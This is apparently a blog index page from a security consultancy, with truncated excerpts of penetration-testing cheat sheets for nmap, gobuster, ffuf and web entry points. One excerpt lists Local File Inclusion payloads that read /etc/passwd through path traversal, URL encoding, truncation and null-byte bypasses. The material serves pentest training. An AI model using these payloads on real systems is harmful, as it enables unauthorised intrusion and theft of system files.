Powered By TEKGENX CONSULTING
Views: 13Threat Intelligence Foundation: Threat Intelligence is the analysis of data and information using tools and techniques to generate meaningful patterns on how to mitigate against potential risks associated with existing or emerging threats targeting organisations, industries, sectors or governments. To mitigate against risks, we can start by trying to answer a few simple questions: … Read more
Views: 6
Views: 7
Views: 7
Views: 55 Command Description sudo nano /etc/hosts Opens the /etc/hosts with nano to start adding hostnames sudo nmap -p 80,443,8000,8080,8180,8888,10000 –open -oA web_discovery -iL scope_list Runs an nmap scan using common web application ports based on a scope list (scope_list) and outputs to a file (web_discovery) in all formats (-oA) eyewitness –web -x web_discovery.xml -d <nameofdirectorytobecreated> Runs eyewitness using a … Read more
Views: 130Common Gobuster Commands dir Mode With content length dns Mode With Show IP Base domain validation warning when the base domain fails to resolve Wildcard DNS is also detected properly: vhost Mode s3 Mode Available Modes Switch Description dir Directory brute-forcing mode dns DNS subdomain brute-forcing mode vhost Virtual host brute-forcing mode (not the … Read more
Views: 215In web application penetration testing, entry points are areas of an application where a user can input data or interact with the system, which an attacker could potentially exploit. Identifying these points is crucial because they represent potential paths for unauthorized access, data manipulation, or other malicious actions. Common entry points include form fields, … Read more
Views: 9
Views: 174Ffuf commands Command Description ffuf -h ffuf help ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ Directory Fuzzing ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZ Extension Fuzzing ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.php Page Fuzzing ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v Recursive Fuzzing ffuf -w wordlist.txt:FUZZ -u https://FUZZ.nlabs.local/ Sub-domain Fuzzing ffuf -w wordlist.txt:FUZZ -u http://nlabs.local:PORT/ … Read more
Views: 69Local File Inclusion Command Description Basic LFI /index.php?language=/etc/passwd Basic LFI /index.php?language=../../../../etc/passwd LFI with path traversal /index.php?language=/../../../etc/passwd LFI with name prefix /index.php?language=./languages/../../../../etc/passwd LFI with approved path LFI Bypasses /index.php?language=….//….//….//….//etc/passwd Bypass basic path traversal filter /index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 Bypass filters with URL encoding /index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times] Bypass appended extension with path truncation (obsolete) /index.php?language=../../../../etc/passwd%00 Bypass appended extension … Read more